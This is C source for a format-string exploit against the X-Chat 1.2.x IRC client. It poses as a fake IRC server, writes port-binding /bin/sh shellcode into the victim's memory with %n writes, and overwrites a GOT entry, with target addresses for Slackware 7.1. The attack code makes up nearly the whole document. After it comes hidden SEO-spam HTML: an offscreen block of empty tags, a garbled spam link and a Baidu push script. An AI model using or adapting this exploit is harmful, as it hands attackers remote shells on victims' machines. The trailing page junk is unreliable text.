/* X-Chat 1.2.x format bug exploit by sectorx of xor
 * THIS IS CONFIDENTIAL PROPERTY OF XOR TEAM, AND MAY NOT BE DISTRIBUTED
 * 
 * *note* this is a beta version, expect more of this.
 */
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <sys/time.h>

#define VULNERABLE 1
typedef struct { 
   char name[80];
   int got;        
   int ret;        /* this should be a stack/data segment address where we
		    * upload the shellcode to, and execute it */
   int offset; 
   int len; 
} vuln;

vuln VULN[VULNERABLE] =
{
     { "X-Chat 1.2.1/Slackware 7.1",0x08105cac,0x8134021,81,4 }
};

char portshell[] =
  /* anathema's portshell code:                                        */
  /* main: */
  "\xeb\x72"                                /* jmp callz               */
  /* start: */
  "\x5e"                                    /* popl %esi               */
  
    /* socket() */
  "\x29\xc0"                                /* subl %eax, %eax         */
  "\x89\x46\x10"                            /* movl %eax, 0x10(%esi)   */
  "\x40"                                    /* incl %eax               */
  "\x89\xc3"                                /* movl %eax, %ebx         */
  "\x89\x46\x0c"                            /* movl %eax, 0x0c(%esi)   */
  "\x40"                                    /* incl %eax               */
  "\x89\x46\x08"                            /* movl %eax, 0x08(%esi)   */
  "\x8d\x4e\x08"                            /* leal 0x08(%esi), %ecx   */
  "\xb0\x66"                                /* movb $0x66, %al         */
  "\xcd\x80"                                /* int $0x80               */
  
    /* bind() */
  "\x43"                                    /* incl %ebx               */
  "\xc6\x46\x10\x10"                        /* movb $0x10, 0x10(%esi)  */
  "\x66\x89\x5e\x14"                        /* movw %bx, 0x14(%esi)    */
  "\x88\x46\x08"                            /* movb %al, 0x08(%esi)    */
  "\x29\xc0"                                /* subl %eax, %eax         */
  "\x89\xc2"                                /* movl %eax, %edx         */
  "\x89\x46\x18"                            /* movl %eax, 0x18(%esi)   */
  "\xb0\x90"                                /* movb $0x90, %al         */
  "\x66\x89\x46\x16"                        /* movw %ax, 0x16(%esi)    */
  "\x8d\x4e\x14"                            /* leal 0x14(%esi), %ecx   */
  "\x89\x4e\x0c"                            /* movl %ecx, 0x0c(%esi)   */
  "\x8d\x4e\x08"                            /* leal 0x08(%esi), %ecx   */
  "\xb0\x66"                                /* movb $0x66, %al         */
  "\xcd\x80"                                /* int $0x80               */
  
    /* listen() */
  "\x89\x5e\x0c"                            /* movl %ebx, 0x0c(%esi)   */
  "\x43"                                    /* incl %ebx               */
  "\x43"                                    /* incl %ebx               */
  "\xb0\x66"                                /* movb $0x66, %al         */
  "\xcd\x80"                                /* int $0x80               */
  
    /* accept() */
  "\x89\x56\x0c"                            /* movl %edx, 0x0c(%esi)   */
  "\x89\x56\x10"                            /* movl %edx, 0x10(%esi)   */
  "\xb0\x66"                                /* movb $0x66, %al         */
  "\x43"                                    /* incl %ebx               */
  "\xcd\x80"                                /* int $0x80               */
  
    /* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
  "\x86\xc3"                                /* xchgb %al, %bl          */
  "\xb0\x3f"                                /* movb $0x3f, %al         */
  "\x29\xc9"                                /* subl %ecx, %ecx         */
  "\xcd\x80"                                /* int $0x80               */
  "\xb0\x3f"                                /* movb $0x3f, %al         */
  "\x41"                                    /* incl %ecx               */
  "\xcd\x80"                                /* int $0x80               */
  "\xb0\x3f"                                /* movb $0x3f, %al         */
  "\x41"                                    /* incl %ecx               */
  "\xcd\x80"                                /* int $0x80               */
  
    /* execve() */
  "\x88\x56\x07"                            /* movb %dl, 0x07(%esi)    */
  "\x89\x76\x0c"                            /* movl %esi, 0x0c(%esi)   */
  "\x87\xf3"                                /* xchgl %esi, %ebx        */
  "\x8d\x4b\x0c"                            /* leal 0x0c(%ebx), %ecx   */
  "\xb0\x0b"                                /* movb $0x0b, %al         */
  "\xcd\x80"                                /* int $0x80               */
  /* callz: */
  "\xe8\x89\xff\xff\xff"                    /* call start              */
  "/bin/sh";

void upload(unsigned char *str, int length, int address, int sys)
{
   int i;
   
   for (i=0;i<length;i++)
     {
	int target;
	unsigned short int word;
	
	
	word   = str[i] + 0x0100;
	target = address + i;
	
	printf(":%.4s%%.%dx%%%d$n!a@a PRIVMSG #own :%c\n",
	       &target,word-VULN[sys].len,VULN[sys].offset,0x70+(rand() % 0x10));
	fflush(stdout);
     }
}

int main(int argc, char *argv[])
{
   char *ircd = "haxornet";
   int sys;
   
   fprintf(stderr, "X-Chat 1.2.x exploit (c) sectorx of xor\n");
   fprintf(stderr, "\E[1m\E[31mTHIS IS CONFIDENTIAL PROPERTY OF XOR TEAM, AND MAY NOT BE DISTRIBUTED.\033[0m\n\n");
   
   if (argc < 2)
     {
	int i;
	
	printf("Usage: (%s <target type> ; cat)|nc -l -p 6667\n",argv[0]);
	printf("Target types:\n");
	for (i=0;i<VULNERABLE;i++)
	  {
	     printf("%d\t:\t%s\n",i,VULN[i].name);
	  }
	exit(1);
     }
   sys = atoi(argv[1])>=VULNERABLE?0:atoi(argv[1]);
   
   /* connect user to fake server */
   printf("NOTICE AUTH :*** Welcome to my ircd\n");
   printf(":%s 001 user1 :Welcome to %1$s\n",ircd);
   printf(":%s 002 user1 :Your host is %1$s\n",ircd);
   printf(":%s 376 user1 :End of /MOTD command.\n",ircd);
   printf(":user1 MODE user1 :+i\n");
   
   printf(":user1!user1@user1.hostname JOIN :#own\n");
   printf(":%s MODE #own +nt\n",ircd);
   printf(":%s 353 user1 = #own :@user1\n");
   printf(":%s 366 user1 #own :End of /NAMES list.\n");
   
   /* Upload shellcode to target address */
   upload(portshell,strlen(portshell),VULN[sys].ret,sys);
   
   /* Change global offset table */
   upload((char*)&VULN[sys].ret,4,VULN[sys].got,sys);   
}
<div style="position:fixed;left:-9000px;top:-9000px;"><em id="7ztzv"></em><center id="7ztzv"></center><mark id="7ztzv"><center id="7ztzv"></center></mark><output id="7ztzv"><noframes id="7ztzv"></noframes></output><font id="7ztzv"><delect id="7ztzv"></delect></font><ruby id="7ztzv"><big id="7ztzv"></big></ruby><progress id="7ztzv"><sub id="7ztzv"></sub></progress><th id="7ztzv"><big id="7ztzv"></big></th><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><video id="7ztzv"></video></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><strike id="7ztzv"><span id="7ztzv"></span></strike><em id="7ztzv"><span id="7ztzv"></span></em><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><noframes id="7ztzv"></noframes></th><em id="7ztzv"><span id="7ztzv"></span></em><ins id="7ztzv"><b id="7ztzv"></b></ins><ol id="7ztzv"><output id="7ztzv"></output></ol><menuitem id="7ztzv"><thead id="7ztzv"></thead></menuitem><del id="7ztzv"><ruby id="7ztzv"></ruby></del><noframes id="7ztzv"><span id="7ztzv"></span></noframes><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><progress id="7ztzv"><thead id="7ztzv"></thead></progress><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><strike id="7ztzv"><pre id="7ztzv"></pre></strike><em id="7ztzv"><address id="7ztzv"></address></em><big id="7ztzv"><address id="7ztzv"></address></big><address id="7ztzv"><listing id="7ztzv"></listing></address><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><big id="7ztzv"><sub id="7ztzv"></sub></big><var id="7ztzv"><meter id="7ztzv"></meter></var><span id="7ztzv"><video id="7ztzv"></video></span><listing id="7ztzv"><mark id="7ztzv"></mark></listing><progress id="7ztzv"><address id="7ztzv"></address></progress><nobr id="7ztzv"><progress id="7ztzv"></progress></nobr><noframes id="7ztzv"><sub id="7ztzv"></sub></noframes><font id="7ztzv"><delect id="7ztzv"></delect></font><strike id="7ztzv"><pre id="7ztzv"></pre></strike><delect id="7ztzv"><menuitem id="7ztzv"></menuitem></delect><em id="7ztzv"><pre id="7ztzv"></pre></em><mark id="7ztzv"><cite id="7ztzv"></cite></mark><delect id="7ztzv"><ins id="7ztzv"></ins></delect><pre id="7ztzv"><rp id="7ztzv"></rp></pre><cite id="7ztzv"><var id="7ztzv"></var></cite><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><ruby id="7ztzv"><p id="7ztzv"></p></ruby><em id="7ztzv"><form id="7ztzv"></form></em><rp id="7ztzv"><em id="7ztzv"></em></rp>
<video id="7ztzv"><noframes id="7ztzv"></noframes></video><cite id="7ztzv"><del id="7ztzv"></del></cite><meter id="7ztzv"><thead id="7ztzv"></thead></meter><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><thead id="7ztzv"></thead></meter><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><mark id="7ztzv"><cite id="7ztzv"></cite></mark><menuitem id="7ztzv"><font id="7ztzv"></font></menuitem><del id="7ztzv"><rp id="7ztzv"></rp></del><thead id="7ztzv"><delect id="7ztzv"></delect></thead><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><ins id="7ztzv"><cite id="7ztzv"></cite></ins><delect id="7ztzv"><output id="7ztzv"></output></delect><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><p id="7ztzv"></p></ruby><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><progress id="7ztzv"><address id="7ztzv"></address></progress><thead id="7ztzv"><var id="7ztzv"></var></thead><ins id="7ztzv"><i id="7ztzv"></i></ins><ins id="7ztzv"><b id="7ztzv"></b></ins><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><ins id="7ztzv"><i id="7ztzv"></i></ins><font id="7ztzv"><delect id="7ztzv"></delect></font><em id="7ztzv"><form id="7ztzv"></form></em><var id="7ztzv"><ins id="7ztzv"></ins></var><span id="7ztzv"><th id="7ztzv"></th></span><ol id="7ztzv"><rp id="7ztzv"></rp></ol><th id="7ztzv"><progress id="7ztzv"></progress></th><address id="7ztzv"><dfn id="7ztzv"></dfn></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><noframes id="7ztzv"><span id="7ztzv"></span></noframes><noframes id="7ztzv"><form id="7ztzv"></form></noframes><big id="7ztzv"><form id="7ztzv"></form></big><track id="7ztzv"><noframes id="7ztzv"></noframes></track><em id="7ztzv"><span id="7ztzv"></span></em><span id="7ztzv"><th id="7ztzv"></th></span><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><em id="7ztzv"></em></video><delect id="7ztzv"><ins id="7ztzv"></ins></delect><b id="7ztzv"><del id="7ztzv"></del></b><progress id="7ztzv"><sub id="7ztzv"></sub></progress><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><rp id="7ztzv"><em id="7ztzv"></em></rp><track id="7ztzv"><noframes id="7ztzv"></noframes></track><address id="7ztzv"><th id="7ztzv"></th></address><cite id="7ztzv"><delect id="7ztzv"></delect></cite><cite id="7ztzv"><var id="7ztzv"></var></cite><output id="7ztzv"><i id="7ztzv"></i></output><track id="7ztzv"><big id="7ztzv"></big></track>
<big id="7ztzv"><address id="7ztzv"></address></big><p id="7ztzv"><dl id="7ztzv"></dl></p><meter id="7ztzv"><font id="7ztzv"></font></meter><address id="7ztzv"><nobr id="7ztzv"></nobr></address><menuitem id="7ztzv"><cite id="7ztzv"></cite></menuitem><pre id="7ztzv"><video id="7ztzv"></video></pre><th id="7ztzv"><progress id="7ztzv"></progress></th><p id="7ztzv"><pre id="7ztzv"></pre></p><ruby id="7ztzv"><em id="7ztzv"></em></ruby><del id="7ztzv"><ins id="7ztzv"></ins></del><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><var id="7ztzv"></var></thead><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><b id="7ztzv"><del id="7ztzv"></del></b><big id="7ztzv"><address id="7ztzv"></address></big><form id="7ztzv"><nobr id="7ztzv"></nobr></form><ol id="7ztzv"><ins id="7ztzv"></ins></ol><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><listing id="7ztzv"><progress id="7ztzv"></progress></listing><delect id="7ztzv"><output id="7ztzv"></output></delect><noframes id="7ztzv"><span id="7ztzv"></span></noframes><track id="7ztzv"><noframes id="7ztzv"></noframes></track><menuitem id="7ztzv"><sub id="7ztzv"></sub></menuitem><address id="7ztzv"><th id="7ztzv"></th></address><address id="7ztzv"><track id="7ztzv"></track></address><nobr id="7ztzv"><meter id="7ztzv"></meter></nobr><em id="7ztzv"><pre id="7ztzv"></pre></em><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><form id="7ztzv"></form></em><form id="7ztzv"><track id="7ztzv"></track></form><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><rp id="7ztzv"><noframes id="7ztzv"></noframes></rp><i id="7ztzv"><ol id="7ztzv"></ol></i><i id="7ztzv"><del id="7ztzv"></del></i><cite id="7ztzv"><delect id="7ztzv"></delect></cite><strike id="7ztzv"><dl id="7ztzv"></dl></strike><dfn id="7ztzv"><mark id="7ztzv"></mark></dfn><address id="7ztzv"><th id="7ztzv"></th></address><ins id="7ztzv"><font id="7ztzv"></font></ins><thead id="7ztzv"><var id="7ztzv"></var></thead><video id="7ztzv"><strike id="7ztzv"></strike></video><p id="7ztzv"><pre id="7ztzv"></pre></p><video id="7ztzv"><i id="7ztzv"></i></video><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><thead id="7ztzv"><listing id="7ztzv"></listing></thead><dl id="7ztzv"><rp id="7ztzv"></rp></dl><address id="7ztzv"><th id="7ztzv"></th></address><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var>
<p id="7ztzv"><var id="7ztzv"></var></p><ins id="7ztzv"><i id="7ztzv"></i></ins><strike id="7ztzv"><span id="7ztzv"></span></strike><del id="7ztzv"><output id="7ztzv"></output></del><font id="7ztzv"><delect id="7ztzv"></delect></font><output id="7ztzv"><em id="7ztzv"></em></output><p id="7ztzv"><span id="7ztzv"></span></p><big id="7ztzv"><thead id="7ztzv"></thead></big><video id="7ztzv"><noframes id="7ztzv"></noframes></video><b id="7ztzv"><ol id="7ztzv"></ol></b><font id="7ztzv"><dfn id="7ztzv"></dfn></font><font id="7ztzv"><var id="7ztzv"></var></font><ins id="7ztzv"><i id="7ztzv"></i></ins><dfn id="7ztzv"><meter id="7ztzv"></meter></dfn><rp id="7ztzv"><strike id="7ztzv"></strike></rp><del id="7ztzv"><ruby id="7ztzv"></ruby></del><var id="7ztzv"><ruby id="7ztzv"></ruby></var><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><del id="7ztzv"><ruby id="7ztzv"></ruby></del><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><track id="7ztzv"><noframes id="7ztzv"></noframes></track><form id="7ztzv"><nobr id="7ztzv"></nobr></form><video id="7ztzv"><big id="7ztzv"></big></video><video id="7ztzv"><em id="7ztzv"></em></video><p id="7ztzv"><span id="7ztzv"></span></p><sub id="7ztzv"><nobr id="7ztzv"></nobr></sub><ins id="7ztzv"><b id="7ztzv"></b></ins><dfn id="7ztzv"><progress id="7ztzv"></progress></dfn><var id="7ztzv"><mark id="7ztzv"></mark></var><font id="7ztzv"><delect id="7ztzv"></delect></font><big id="7ztzv"><sub id="7ztzv"></sub></big><address id="7ztzv"><th id="7ztzv"></th></address><form id="7ztzv"><th id="7ztzv"></th></form><mark id="7ztzv"><cite id="7ztzv"></cite></mark><progress id="7ztzv"><font id="7ztzv"></font></progress><mark id="7ztzv"><cite id="7ztzv"></cite></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><mark id="7ztzv"><font id="7ztzv"></font></mark><strike id="7ztzv"><form id="7ztzv"></form></strike><pre id="7ztzv"><video id="7ztzv"></video></pre><strike id="7ztzv"><dl id="7ztzv"></dl></strike><delect id="7ztzv"><ins id="7ztzv"></ins></delect><dl id="7ztzv"><rp id="7ztzv"></rp></dl><listing id="7ztzv"><menuitem id="7ztzv"></menuitem></listing><p id="7ztzv"><dl id="7ztzv"></dl></p><mark id="7ztzv"><i id="7ztzv"></i></mark><meter id="7ztzv"><sub id="7ztzv"></sub></meter><rp id="7ztzv"><em id="7ztzv"></em></rp><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead>
<th id="7ztzv"><big id="7ztzv"></big></th><del id="7ztzv"><rp id="7ztzv"></rp></del><video id="7ztzv"><big id="7ztzv"></big></video><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><big id="7ztzv"><sub id="7ztzv"></sub></big><track id="7ztzv"><em id="7ztzv"></em></track><cite id="7ztzv"><ol id="7ztzv"></ol></cite><i id="7ztzv"><dl id="7ztzv"></dl></i><noframes id="7ztzv"><address id="7ztzv"></address></noframes><ruby id="7ztzv"><i id="7ztzv"></i></ruby><delect id="7ztzv"><output id="7ztzv"></output></delect><delect id="7ztzv"><output id="7ztzv"></output></delect><thead id="7ztzv"><dfn id="7ztzv"></dfn></thead><ol id="7ztzv"><ruby id="7ztzv"></ruby></ol><delect id="7ztzv"><output id="7ztzv"></output></delect><var id="7ztzv"><menuitem id="7ztzv"></menuitem></var><track id="7ztzv"><big id="7ztzv"></big></track><rp id="7ztzv"><em id="7ztzv"></em></rp><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><b id="7ztzv"></b></mark><i id="7ztzv"><ol id="7ztzv"></ol></i><progress id="7ztzv"><sub id="7ztzv"></sub></progress><rp id="7ztzv"><strike id="7ztzv"></strike></rp><font id="7ztzv"><var id="7ztzv"></var></font><span id="7ztzv"><th id="7ztzv"></th></span><video id="7ztzv"><strike id="7ztzv"></strike></video><th id="7ztzv"><em id="7ztzv"></em></th><delect id="7ztzv"><ins id="7ztzv"></ins></delect><sub id="7ztzv"><delect id="7ztzv"></delect></sub><progress id="7ztzv"><sub id="7ztzv"></sub></progress><sub id="7ztzv"><listing id="7ztzv"></listing></sub><thead id="7ztzv"><listing id="7ztzv"></listing></thead><form id="7ztzv"><th id="7ztzv"></th></form><track id="7ztzv"><em id="7ztzv"></em></track><dfn id="7ztzv"><menuitem id="7ztzv"></menuitem></dfn><b id="7ztzv"><dl id="7ztzv"></dl></b><nobr id="7ztzv"><big id="7ztzv"></big></nobr><track id="7ztzv"><progress id="7ztzv"></progress></track><ruby id="7ztzv"><p id="7ztzv"></p></ruby><pre id="7ztzv"><nobr id="7ztzv"></nobr></pre><pre id="7ztzv"><track id="7ztzv"></track></pre><ruby id="7ztzv"><strike id="7ztzv"></strike></ruby><em id="7ztzv"><span id="7ztzv"></span></em><mark id="7ztzv"><i id="7ztzv"></i></mark><rp id="7ztzv"><p id="7ztzv"></p></rp><delect id="7ztzv"><ruby id="7ztzv"></ruby></delect><sub id="7ztzv"><dfn id="7ztzv"></dfn></sub><thead id="7ztzv"><var id="7ztzv"></var></thead><i id="7ztzv"><ol id="7ztzv"></ol></i><track id="7ztzv"><strike id="7ztzv"></strike></track></div>

<a href="http://www.bjnorthway.com/">ÑÇÖÞÅ·ÃÀÔÚÏß</a>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
</body>